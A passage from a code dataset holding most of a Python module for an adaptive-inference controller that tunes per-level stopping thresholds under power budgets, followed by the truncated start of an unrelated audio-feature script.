get_power_for_levels(power: np.ndarray, num_levels: int) -> np.ndarray:\n assert num_levels <= len(power), 'Must have fewer levels than power estimates' \n\n if len(power) == num_levels:\n return power\n\n median_index = int(len(power) / 2)\n start_index = median_index - int(num_levels / 2)\n end_index = start_index + num_levels\n return power[start_index:end_index]\n\n\ndef fetch_model_states(model: AdaptiveModel, dataset: Dataset, series: DataSeries):\n logit_ops = [get_logits_name(i) for i in range(model.num_outputs)]\n state_ops = [get_states_name(i) for i in range(model.num_outputs)]\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(model.num_outputs)]\n\n data_generator = dataset.minibatch_generator(series=series,\n batch_size=model.hypers.batch_size,\n metadata=model.metadata,\n should_shuffle=False)\n # Lists to keep track of model results\n labels: List[np.ndarray] = []\n states: List[np.ndarray] = []\n stop_outputs: List[np.ndarray] = []\n level_predictions: List[np.ndarray] = []\n level_logits: List[np.ndarray] = []\n\n # Index of state to use for stop/start prediction\n states_index = 0\n if model.model_type == AdaptiveModelType.CASCADE:\n states_index = -1\n\n seq_length = model.metadata[SEQ_LENGTH]\n num_sequences = model.num_sequences\n\n for batch_num, batch in enumerate(data_generator):\n # Compute the predicted log probabilities\n feed_dict = model.batch_to_feed_dict(batch, is_train=False)\n model_results = model.execute(feed_dict, logit_ops + state_ops + stop_output_ops)\n\n first_states = np.concatenate([np.expand_dims(np.squeeze(model_results[op][states_index]), axis=1) for op in state_ops], axis=1) # [B, D]\n\n inputs = np.array(batch[INPUTS])\n states.append(first_states)\n\n # Concatenate logits into a [B, L, C] array (logit_ops is already ordered by level).\n # For reference, L is the number of levels and C is the number of classes\n logits_concat = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in logit_ops], axis=1)\n level_logits.append(logits_concat)\n\n # Compute the predictions for each level\n level_pred = np.argmax(logits_concat, axis=-1) # [B, L]\n level_predictions.append(level_pred)\n\n true_values = np.squeeze(batch[OUTPUT])\n labels.append(true_values)\n\n batch_stop_outputs = np.concatenate([np.expand_dims(model_results[op], axis=1) for op in stop_output_ops], axis=1) # [B, T]\n stop_outputs.append(batch_stop_outputs)\n\n states = np.concatenate(states, axis=0)\n level_predictions = np.concatenate(level_predictions, axis=0)\n labels = np.concatenate(labels, axis=0).reshape(-1, 1)\n level_logits = np.concatenate(level_logits, axis=0)\n stop_outputs = np.concatenate(stop_outputs, axis=0)\n\n y = (level_predictions == labels).astype(float)\n print('Level Accuracy: {0}'.format(np.average(y, axis=0)))\n\n return states, y, level_logits, labels, stop_outputs\n\n\ndef levels_to_execute(logistic_probs: np.ndarray, thresholds: np.ndarray) -> np.ndarray:\n # Compute the predictions based on this threshold setting. The level predictions are a 0/1\n # array which is 0 when we should NOT use this level and 1 when we should\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_predictions = (logistic_probs > expanded_thresholds).astype(int) # [S, B, L]\n\n # Based on these level predictions, we compute the number of levels for each batch sample\n level_idx = np.arange(start=0, stop=thresholds.shape[-1])\n mask = (1.0 - level_predictions) * BIG_NUMBER # Big number when incorrect, 0 when correct\n index_mask = mask + level_idx # [S, B, L]\n levels = np.min(index_mask, axis=-1) # [S, B]\n levels = np.minimum(levels, thresholds.shape[-1] - 1).astype(int) # Clip the output, [S, B]\n\n return levels\n\n\ndef adjust_thresholds(clf_predictions: np.ndarray, thresholds: np.ndarray, target_distribution: np.ndarray, precision: int) -> np.ndarray:\n fp_one = 1 << precision\n thresholds = np.copy(thresholds)\n num_levels = thresholds.shape[1]\n num_budgets = thresholds.shape[0]\n\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for level in range(num_levels):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n direction = 1 - 2 * (target_distribution[:, level] > level_fractions[:, level]).astype(float)\n\n i = 0\n while (direction * (target_distribution[:, level] - level_fractions[:, level]) <= 0).all() and i < fp_one:\n thresholds[:, level] += (direction / fp_one)\n thresholds = np.clip(thresholds, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n\n # Compute the approximate power and accuracy\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n level_fractions = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n i += 1\n\n thresholds[:, level] -= (direction / fp_one)\n final_levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(final_levels[i, :], minlength=num_levels) for i in range(num_budgets)]) # [S, L]\n final_distribution = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n\n return thresholds\n\n\ndef level_errors(logistic_probs: np.ndarray, thresholds: np.ndarray, network_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Calculates the distribution of threshold errors for each model level. This is used purely for debugging.\n\n Args:\n logistic_probs: A [1, B, L] array of logistic regression probabilities.\n thresholds: A [S, L] array of learned thresholds\n network_predictions: A [1, B, L] array of 0/1 classifications for each level.\n \"\"\"\n expanded_thresholds = np.expand_dims(thresholds, axis=1) # [S, 1, L]\n level_diff = logistic_probs - expanded_thresholds # [S, B, L]\n\n levels = levels_to_execute(logistic_probs, thresholds) # [S, B]\n\n for budget_idx, budget_thresholds in enumerate(thresholds): # [S]\n print(budget_thresholds)\n for level in range(thresholds.shape[1] - 1): # [L]\n is_incorrect = (1.0 - network_predictions[:, level]) # [B]\n is_correct = network_predictions[:, level] # [B]\n prob_diff = level_diff[budget_idx, :, level] # [B]\n chosen_levels = (levels[budget_idx, :] == level).astype(float) # [B]\n\n logistic_variance = np.square(np.std(logistic_probs[:, level]))\n logistic_avg = np.average(logistic_probs[:, level])\n\n incorrect_mask = is_incorrect * chosen_levels\n incorrect_diff = incorrect_mask * prob_diff\n avg_inc_diff = np.sum(incorrect_diff) / np.maximum(np.sum(incorrect_mask), SMALL_NUMBER)\n\n correct_mask = is_correct * chosen_levels\n correct_diff = correct_mask * prob_diff\n avg_cor_diff = np.sum(correct_diff) / np.maximum(np.sum(correct_mask), SMALL_NUMBER)\n\n print('Average Gap on Level {0}: Incorrect -> {1:.5f}, Correct -> {2:.5f}, Prob Avg (Var): {3:.5f} ({4:.5f})'.format(level, avg_inc_diff, avg_cor_diff, logistic_avg, logistic_variance))\n\n\ndef predictions_for_levels(model_predictions: np.ndarray, levels: np.ndarray, batch_idx: np.ndarray) -> np.ndarray:\n preds_per_sample: List[np.ndarray] = []\n for i in range(levels.shape[0]):\n level_pred = np.squeeze(model_predictions[batch_idx, levels[i, :]])\n preds_per_sample.append(level_pred)\n\n preds_per_sample = np.vstack(preds_per_sample) # [S, B]\n return preds_per_sample\n\n\ndef fit_anneal_rate(start_value: float, end_value: float, steps: int):\n return np.exp((1.0 / steps) * np.log(np.max(end_value, SMALL_NUMBER) / np.max(start_value, SMALL_NUMBER)))\n\n\n### Budget optimizer classes ###\n\nclass BudgetOptimizer:\n \n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, min_iter: int, patience: int, power: np.ndarray):\n self._num_levels = num_levels\n self._num_budgets = budgets.shape[0]\n self._budgets = budgets\n self._precision = precision\n self._trials = trials\n self._max_iter = max_iter\n self._patience = patience\n self._rand = np.random.RandomState(seed=42)\n self._thresholds = None\n self._min_iter = min_iter\n self._power = power\n\n def fit(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def evaluate(self, network_predictions: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n raise NotImplementedError()\n\n def get_approx_power(self, levels: np.ndarray) -> np.ndarray:\n \"\"\"\n Approximates the power consumption given profiled power results.\n\n Args:\n levels: A [S, B] array of the levels for each sample (B) and budget (S)\n Returns:\n An [S] array containing the average power consumption for each budget thresholds.\n \"\"\"\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n normalized_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True) # [S, L]\n approx_power = np.sum(normalized_level_counts * self._power, axis=-1).astype(float) # [S]\n return approx_power, normalized_level_counts\n\n\nclass SimulatedAnnealingOptimizer(BudgetOptimizer):\n\n def __init__(self, num_levels: int, budgets: np.ndarray, precision: int, trials: int, max_iter: int, patience: int, temp: float, anneal_rate: float):\n super().__init__(num_levels, budgets, precision, trials, max_iter, patience)\n self._max_iter = max_iter\n self._temp = temp\n self._anneal_rate = anneal_rate\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Initialize thresholds, [S, L] array\n thresholds = round_to_precision(self._rand.uniform(low=0.2, high=0.8, size=(self._num_budgets, self._num_levels)), self._precision)\n thresholds = np.flip(np.sort(thresholds, axis=-1), axis=-1)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Array of level indices\n level_idx = np.arange(start=0, stop=self._num_levels).reshape(1, 1, -1) # [1, 1, L]\n batch_idx = np.arange(start=0, stop=clf_predictions.shape[1]) # [B]\n\n # Variable for convergence\n early_stopping_counter = 0\n\n best_fitness = np.zeros(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n margin = 0.4\n temp = self._temp\n\n for i in range(self._max_iter):\n prev_thresholds = np.copy(thresholds)\n \n # Generate a random move\n random_move = round_to_precision(self._rand.uniform(low=-margin, high=margin, size=thresholds.shape), self._precision)\n random_move[:, -1] = 0\n\n candidate_thresholds = np.clip(thresholds + random_move, a_min=0, a_max=1)\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=candidate_thresholds)\n\n # Compute the approximate power and accuracy\n approx_power, _ = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, VIOLATION_FACTOR * dual_term, -UNDERSHOOT_FACTOR * dual_term)\n\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n # Compute the fitness (we aim to maximize this objective)\n fitness = accuracy - dual_penalty\n\n # Determine when to set thresholds based on fitness and temperature\n random_move_prob = self._rand.uniform(low=0.0, high=1.0, size=(self._num_budgets, ))\n fitness_diff = fitness - best_fitness # [S]\n temperature_prob = np.exp(-1 * fitness_diff / temp)\n\n selection = np.logical_or(fitness_diff > 0, temperature_prob > random_move_prob)\n best_fitness = np.where(selection, fitness, best_fitness)\n best_power = np.where(selection, approx_power, best_power)\n thresholds = np.where(selection, candidate_thresholds, thresholds)\n\n # Anneal the temperature\n temp = temp * self._anneal_rate\n\n print('Completed iteration {0}: Fitness -> {1}'.format(i+1, best_fitness))\n\n if np.isclose(thresholds, prev_thresholds).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n return thresholds\n\n\nclass CoordinateOptimizer(BudgetOptimizer):\n\n def fitness_function(self, thresholds: np.ndarray, network_results: np.ndarray, clf_predictions: np.ndarray, batch_size: int, violation_factor: float, undershoot_factor: float):\n # Compute the number of levels to execute\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds) # [B]\n\n # Compute the approximate power\n approx_power, normalized_level_counts = self.get_approx_power(levels=levels)\n dual_term = approx_power - self._budgets # [S]\n dual_penalty = np.where(dual_term > 0, violation_factor, undershoot_factor) * np.square(dual_term)\n\n # Compute the accuracy\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return -accuracy + dual_penalty, approx_power\n\n def fit(self, network_results: np.ndarray, clf_predictions: np.ndarray):\n best_thresholds = np.ones(shape=(self._num_budgets, self._num_levels))\n best_fitness = np.ones(shape=(self._num_budgets, 1), dtype=float)\n\n # Reshape the validation arrays\n valid_clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n for t in range(self._trials):\n print('===== Starting Trial {0} ====='.format(t))\n\n init_thresholds = np.random.uniform(low=MIN_INIT, high=MAX_INIT, size=(self._num_budgets, self._num_levels))\n init_thresholds = round_to_precision(init_thresholds, self._precision)\n init_thresholds = np.flip(np.sort(init_thresholds, axis=-1), axis=-1) # [S, L]\n\n thresholds = self.fit_single(network_results=network_results,\n clf_predictions=clf_predictions,\n init_thresholds=init_thresholds)\n\n # Compute the fitness\n fitness, _ = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=valid_clf_predictions,\n batch_size=valid_clf_predictions.shape[1],\n violation_factor=VIOLATION_FACTOR,\n undershoot_factor=UNDERSHOOT_FACTOR)\n fitness = np.expand_dims(fitness, axis=1)\n\n best_thresholds = np.where(fitness < best_fitness, thresholds, best_thresholds)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n print('Completed Trial {0}. Best Fitness: {1}'.format(t, best_fitness))\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n self._thresholds = best_thresholds\n return best_thresholds, avg_level_counts\n\n def print_accuracy_for_levels(self, clf_predictions: np.ndarray, network_results: np.ndarray, thresholds: np.ndarray):\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=thresholds)\n level_counts = np.vstack([np.bincount(levels[i, :], minlength=self._num_levels) for i in range(self._num_budgets)]) # [S, L]\n avg_level_counts = level_counts / np.sum(level_counts, axis=-1, keepdims=True)\n\n batch_idx = np.arange(levels.shape[1]) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n print('Level Counts: {0}'.format(avg_level_counts))\n\n # Calculate the accuracy for each level\n for i in range(self._num_levels):\n level_mask = (levels == i).astype(float) # [S, B]\n level_correct = np.sum(correct_per_level * level_mask, axis=-1) # [S]\n level_accuracy = level_correct / (np.sum(level_mask, axis=-1) + SMALL_NUMBER) # [S]\n\n print('Accuracy when stopping at level {0}: {1}'.format(i, level_accuracy))\n\n def evaluate(self, network_results: np.ndarray, clf_predictions: np.ndarray) -> np.ndarray:\n \"\"\"\n Evaluates the already-fitted thresholds on the given data points.\n \"\"\"\n assert self._thresholds is not None, 'Must fit the optimizer first'\n\n # Compute the number of levels to execute per sample\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n # Compute the accuracy for each budget\n batch_size = network_results.shape[0]\n batch_idx = np.arange(start=0, stop=batch_size) # [B]\n correct_per_level = predictions_for_levels(model_predictions=network_results, levels=levels, batch_idx=batch_idx)\n\n accuracy = np.average(correct_per_level, axis=-1) # [S]\n\n return accuracy\n\n def fit_single(self, network_results: np.ndarray, clf_predictions: np.ndarray, init_thresholds: np.ndarray) -> np.ndarray:\n \"\"\"\n Fits the optimizer to the given predictions of the logistic regression model and neural network model.\n\n Args:\n network_results: A [B, L] array of results for each sample and level in the neural network. The results\n are 0/1 values indicating if this sample was classified correctly (1) or incorrectly (0)\n clf_predictions: A [B, L] array of classifications by the logistic regression model.\n patience: Number of trials without change to detect convergence.\n \"\"\"\n # Expand the clf predictions for later broadcasting\n clf_predictions = np.expand_dims(clf_predictions, axis=0) # [1, B, L]\n\n # Copy the initial thresholds, [S, L] array\n thresholds = np.copy(init_thresholds)\n thresholds[:, -1] = 0\n\n # The number 1 in fixed point representation\n fp_one = 1 << self._precision\n\n # Variable for convergence\n early_stopping_counter = 0\n prev_thresholds = np.copy(thresholds)\n\n # best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n # best_power = np.zeros_like(best_fitness)\n\n # Initialize penalty parameters\n violation_factor = 1e-4\n entropy_factor = 1e-4\n undershoot_factor = 1e-4\n\n violation_anneal_rate = fit_anneal_rate(start_value=violation_factor, end_value=VIOLATION_FACTOR, steps=self._min_iter)\n undershoot_anneal_rate = fit_anneal_rate(start_value=undershoot_factor, end_value=UNDERSHOOT_FACTOR, steps=self._min_iter)\n\n for i in range(self._max_iter):\n\n # Select a random level to run\n level = self._rand.randint(low=0, high=self._num_levels - 1)\n\n # [S] array of threshold values\n best_t = np.copy(thresholds[:, level]) # The 'best' are the previous thresholds at this level\n best_fitness = np.ones(shape=(self._num_budgets,), dtype=float)\n best_power = np.zeros_like(best_fitness)\n \n # Create the start values to enable a interval of size [MARGIN] within [0, 1]\n fp_init = (best_t * fp_one).astype(int)\n end_values = np.minimum(fp_init + int((MARGIN + 1) / 2), fp_one)\n start_values = np.maximum(end_values - MARGIN, 0)\n\n # start_values = np.maximum((best_t * fp_one).astype(int) - int(MARGIN / 2), 0)\n\n # Variables for tie-breaking\n steps = np.zeros_like(best_fitness)\n prev_level_fitness = np.ones_like(best_fitness)\n prev_level_approx_power = np.zeros_like(best_power)\n current_thresholds = np.zeros_like(best_t) # [S]\n\n # print('Starting threshold: {0}'.format(best_t))\n\n for offset in range(MARGIN):\n\n # Compute the predictions using the threshold on the logistic regression model\n candidate_values = np.minimum((start_values + offset) / fp_one, 1)\n thresholds[:, level] = candidate_values\n\n # Compute the fitness\n fitness, approx_power = self.fitness_function(thresholds=thresholds,\n network_results=network_results,\n clf_predictions=clf_predictions,\n batch_size=clf_predictions.shape[1],\n violation_factor=violation_factor,\n undershoot_factor=undershoot_factor)\n\n # print('Fitness: {0}, Candidate Value: {1}'.format(fitness, candidate_values))\n\n # Initialize variables on first iteration\n #if offset == 0:\n # prev_level_fitness = np.copy(fitness)\n # prev_level_approx_power = np.copy(approx_power)\n # current_thresholds = np.copy(thresholds[:, level])\n\n ## Set the best values at inflection points in the fitness\n #offset_condition = np.full(shape=fitness.shape, fill_value=(offset == MARGIN - 1 or offset == 0))\n #is_fitness_same = np.isclose(prev_level_fitness, fitness)\n\n #should_set = np.logical_and(prev_level_fitness <= best_fitness, \\\n # np.logical_or(np.logical_not(is_fitness_same), offset_condition))\n\n #median_thresholds = np.clip(current_thresholds + ((0.5 * steps).astype(int) / fp_one), a_min=0.0, a_max=1.0)\n #best_t = np.where(should_set, median_thresholds, best_t) # Set the thresholds to the median amount\n #best_power = np.where(should_set, prev_level_approx_power, best_power)\n #best_fitness = np.where(should_set, prev_level_fitness, best_fitness)\n\n ## If the fitness is equal to the previous fitness, then we add to the steps.\n ## Otherwise, we reset.\n #steps = np.where(np.isclose(prev_level_fitness, fitness), steps + 1, 0)\n\n ## Reset variables\n #current_thresholds = np.where(np.logical_not(is_fitness_same), thresholds[:, level], current_thresholds)\n #prev_level_fitness = np.copy(fitness)\n #prev_level_approx_power = np.copy(approx_power)\n\n best_t = np.where(fitness < best_fitness, candidate_values, best_t)\n best_power = np.where(fitness < best_fitness, approx_power, best_power)\n best_fitness = np.where(fitness < best_fitness, fitness, best_fitness)\n\n thresholds[:, level] = best_t # Set the best thresholds\n print('Completed Iteration: {0}: level {1}'.format(i, level))\n print('\\tBest Fitness: {0}'.format(-1 * best_fitness))\n print('\\tApprox Power: {0}'.format(best_power))\n # print('\\tThresholds: {0}'.format(thresholds))\n\n if i >= self._min_iter and (np.isclose(thresholds, prev_thresholds)).all():\n early_stopping_counter += 1\n else:\n early_stopping_counter = 0\n\n if early_stopping_counter >= self._patience:\n print('Converged.')\n break\n\n if i < self._min_iter:\n violation_factor = violation_factor * violation_anneal_rate\n undershoot_factor = undershoot_factor * undershoot_anneal_rate\n\n prev_thresholds = np.copy(thresholds)\n\n return thresholds\n\n\n### Model Controllers ###\n\nclass Controller:\n\n def __init__(self, model_path: str,\n dataset_folder: str,\n share_model: bool,\n precision: int,\n budgets: List[float],\n trials: int,\n power: np.ndarray,\n budget_optimizer_type: str,\n patience: int,\n max_iter: int,\n min_iter: int):\n self._model_path = model_path\n self._dataset_folder = dataset_folder\n\n # Load the model and dataset\n model, dataset, _ = get_serialized_info(model_path, dataset_folder=dataset_folder)\n\n self._model = model\n self._dataset = dataset\n self._is_fitted = False\n self._share_model = share_model\n self._num_levels = model.num_outputs\n\n self._budgets = np.array(budgets)\n self._num_budgets = len(self._budgets)\n self._precision = precision\n self._trials = trials\n self._thresholds = None\n self._patience = patience\n self._max_iter = max_iter\n self._min_iter = min_iter\n\n self._power = get_power_for_levels(power, self._num_levels)\n\n # Create the budget optimizer\n self._budget_optimizer_type = budget_optimizer_type.lower()\n if self._budget_optimizer_type == 'coordinate':\n self._budget_optimizer = CoordinateOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n elif self._budget_optimizer_type == 'sim-anneal':\n self._budget_optimizer = SimulatedAnnealingOptimizer(num_levels=self._num_levels,\n budgets=self._budgets,\n precision=self._precision,\n trials=self._trials,\n temp=0.1,\n anneal_rate=0.95,\n patience=patience,\n max_iter=max_iter,\n min_iter=min_iter,\n power=self._power)\n else:\n raise ValueError('Unknown budget optimizer: {0}'.format(budget_optimizer_type))\n\n def fit(self, series: DataSeries):\n X_train, y_train, train_logits, train_labels, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n X_test, y_test, test_logits, test_labels, test_clf_predictions = fetch_model_states(self._model, self._dataset, series=DataSeries.TEST)\n\n # Fit the thresholds\n self._thresholds, self._avg_level_counts = self._budget_optimizer.fit(network_results=y_train, clf_predictions=clf_predictions)\n \n # Evaluate the model optimizer\n print('======')\n train_acc = self._budget_optimizer.evaluate(network_results=y_train, clf_predictions=clf_predictions)\n test_acc = self._budget_optimizer.evaluate(network_results=y_test, clf_predictions=test_clf_predictions)\n\n print('Train Accuracy: {0}'.format(train_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_train, clf_predictions=clf_predictions, thresholds=self._thresholds)\n # level_errors(clf_predictions, self._thresholds, y_train)\n\n print('Test Accuracy: {0}'.format(test_acc))\n self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=self._thresholds)\n # level_errors(test_clf_predictions, self._thresholds, y_test)\n\n print('=====')\n\n # adjusted_thresholds = adjust_thresholds(test_clf_predictions, thresholds=self._thresholds, precision=self._precision, target_distribution=self._avg_level_counts)\n # print('Adjusted Test Accuracy:')\n # self._budget_optimizer.print_accuracy_for_levels(network_results=y_test, clf_predictions=test_clf_predictions, thresholds=adjusted_thresholds)\n\n self._is_fitted = True\n\n def score(self, series: DataSeries) -> np.ndarray:\n assert self._is_fitted, 'Model is not fitted'\n X, y, _, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n\n if self._share_model:\n X = X.reshape(-1, X.shape[-1])\n y = y.reshape(-1)\n\n accuracy = self._clf.score(X, y)\n else:\n total_accuracy = 0.0\n for level in range(self._model.num_outputs):\n total_accuracy += self._clf[level].score(X[:, level, :], y[:, level])\n\n accuracy = total_accuracy / self._model.num_outputs\n\n return accuracy\n\n def get_thresholds(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._thresholds[budget_idx]\n\n def get_avg_level_counts(self, budget: int) -> np.ndarray:\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n return self._avg_level_counts[budget_idx]\n\n def predict_sample(self, inputs: np.ndarray, budget: int, thresholds: Optional[np.ndarray] = None) -> int:\n \"\"\"\n Predicts the number of levels given the list of hidden states. The states are assumed to be in order.\n\n Args:\n inputs: An array of inputs for this sequence\n budget: The budget to perform inference under. This controls the employed thresholds.\n thresholds: Optional set of thresholds to use. This argument overrides the inferred thresholds.\n Returns:\n The number of levels to execute.\n \"\"\"\n assert self._is_fitted, 'Model is not fitted'\n\n # Get thresholds for this budget\n if thresholds is None:\n # Infer the thresholds for this budget\n thresholds = self.get_thresholds(budget)\n\n stop_output_ops = ['stop_output_{0}'.format(i) for i in range(self._model.num_outputs)]\n \n # Create the input feed dict\n seq_length = self._model.metadata[SEQ_LENGTH]\n num_sequences = self._model.num_sequences\n samples_per_seq = int(seq_length / num_sequences)\n feed_dict = dict()\n for i in range(self._model.num_outputs):\n input_ph = self._model.placeholders[get_input_name(i)]\n if self._model.model_type in (AdaptiveModelType.SAMPLE, AdaptiveModelType.BIDIR_SAMPLE, AdaptiveModelType.ADAPTIVE_NBOW):\n seq_indexes = list(range(i, seq_length, num_sequences))\n sample_tensor = inputs[seq_indexes]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n else: # Cascade\n start, end = i * samples_per_seq, (i+1) * samples_per_seq\n sample_tensor = inputs[start:end]\n feed_dict[input_ph] = np.expand_dims(sample_tensor, axis=0) # Make batch size 1\n\n # Supply dropout (needed for Adaptive NBOW)\n feed_dict[self._model.placeholders[DROPOUT_KEEP_RATE]] = 1.0\n\n model_result = self._model.execute(ops=stop_output_ops, feed_dict=feed_dict)\n for level, op_name in enumerate(stop_output_ops):\n stop_prob = model_result[op_name]\n\n if thresholds[level] < stop_prob:\n return level\n\n # By default, we return the top level\n return self._num_levels - 1\n\n def predict_levels(self, series: DataSeries, budget: float) -> Tuple[np.ndarray, np.ndarray]:\n assert self._is_fitted, 'Model is not fitted'\n\n budget_idx = index_of(self._budgets, value=budget)\n assert budget_idx >= 0, 'Could not find values for budget {0}'.format(budget)\n\n X, ypred, logits, _, clf_predictions = fetch_model_states(self._model, self._dataset, series=series)\n level_predictions = np.argmax(logits, axis=-1) # [B, L]\n\n levels = levels_to_execute(logistic_probs=clf_predictions, thresholds=self._thresholds)\n\n batch_idx = np.arange(level_predictions.shape[0])\n predictions = predictions_for_levels(model_predictions=level_predictions,\n levels=levels,\n batch_idx=batch_idx)\n\n return levels[budget_idx].astype(int), predictions[budget_idx].astype(int)\n\n def as_dict(self):\n return {\n 'budgets': self._budgets,\n 'thresholds': self._thresholds,\n 'trials': self._trials,\n 'is_fitted': self._is_fitted,\n 'model_path': self._model_path,\n 'dataset_folder': self._dataset_folder,\n 'share_model': self._share_model,\n 'precision': self._precision,\n 'patience': self._patience,\n 'max_iter': self._max_iter,\n 'min_iter': self._min_iter,\n 'budget_optimizer_type': self._budget_optimizer_type,\n 'avg_level_counts': self._avg_level_counts\n }\n\n def save(self, output_file: Optional[str] = None):\n \"\"\"\n Serializes the model into a pickle file.\n \"\"\"\n # Create a default file name if none is given\n if output_file is None:\n save_folder, model_path = os.path.split(self._model_path)\n model_name = extract_model_name(model_path)\n output_file = os.path.join(save_folder, CONTROLLER_PATH.format(model_name))\n\n # Save the model components\n save_pickle_gz(self.as_dict(), output_file)\n\n @classmethod\n def load(cls, save_file: str):\n \"\"\"\n Loads the controller from the given serialized file.\n \"\"\"\n # Load the serialized information.\n serialized_info = read_pickle_gz(save_file)\n\n # Initialize the new controller\n controller = Controller(model_path=serialized_info['model_path'],\n dataset_folder=serialized_info['dataset_folder'],\n share_model=serialized_info['share_model'],\n precision=serialized_info['precision'],\n budgets=serialized_info['budgets'],\n trials=serialized_info['trials'],\n budget_optimizer_type=serialized_info['budget_optimizer_type'],\n patience=serialized_info.get('patience', 10),\n max_iter=serialized_info.get('max_iter', 100),\n min_iter=serialized_info.get('min_iter', 20),\n power=POWER)\n\n # Set remaining fields\n controller._thresholds = serialized_info['thresholds']\n controller._avg_level_counts = serialized_info['avg_level_counts']\n controller._is_fitted = serialized_info['is_fitted']\n\n return controller\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--model-paths', type=str, nargs='+')\n parser.add_argument('--dataset-folder', type=str)\n parser.add_argument('--budgets', type=float, nargs='+')\n parser.add_argument('--precision', type=int, required=True)\n parser.add_argument('--trials', type=int, default=3)\n parser.add_argument('--patience', type=int, default=15)\n parser.add_argument('--max-iter', type=int, default=100)\n parser.add_argument('--min-iter', type=int, default=20)\n parser.add_argument('--budget-optimizer', type=str, choices=['coordinate', 'sim-anneal'])\n args = parser.parse_args()\n\n for model_path in args.model_paths:\n print('Starting model at {0}'.format(model_path))\n\n # Create the adaptive model\n controller = Controller(model_path=model_path,\n dataset_folder=args.dataset_folder,\n share_model=False,\n precision=args.precision,\n budgets=args.budgets,\n trials=args.trials,\n power=POWER,\n budget_optimizer_type=args.budget_optimizer,\n patience=args.patience,\n max_iter=args.max_iter,\n min_iter=args.min_iter)\n \n # Fit the model on the validation set\n controller.fit(series=DataSeries.VALID)\n controller.save()\n\n # print('Validation Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.VALID))) \n # print('Test Accuracy: {0:.5f}'.format(controller.score(series=DataSeries.TEST)))\n","sub_path":"src/controllers/logistic_regression_controller.py","file_name":"logistic_regression_controller.py","file_ext":"py","file_size_in_byte":39966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536255893","text":"import window\nimport sklearn.model_selection\nimport scipy.io.wavfile\nimport numpy as np\n\nimport scipy.fftpack, scipy.signal\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport scipy.io, scipy.io.wavfile, scipy.stats\nimport sklearn.metrics\n\n# possible feature transforms\n# you don't know what these do, but you can try applying them\n# and see how they affect the visualisations\nfeature_fns = {\n \"dct\": lambda x: np.abs(scipy.fftpack.dct(x)),\n \"fft\": lambda x: 